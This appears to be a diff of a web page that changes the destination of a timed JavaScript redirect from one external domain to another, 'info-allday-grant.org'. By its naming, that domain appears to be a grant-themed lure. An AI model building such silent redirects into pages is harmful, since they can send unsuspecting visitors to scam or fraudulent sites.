--- a/mtndamba.html
+++ b/mtndamba.html
@@ -1011,10 +1011,10 @@
         fh();}
     setTimeout('hh();', 500);
     function fh(){
-        location.href="http://outrotomr.com/4/3144603";
+        location.href="https://info-allday-grant.org/sagrant.html";
     }
     function goon(){
-        location.href="http://outrotomr.com/4/3144603";
+        location.href="https://info-allday-grant.org/sagrant.html";
     }
 </script>
 
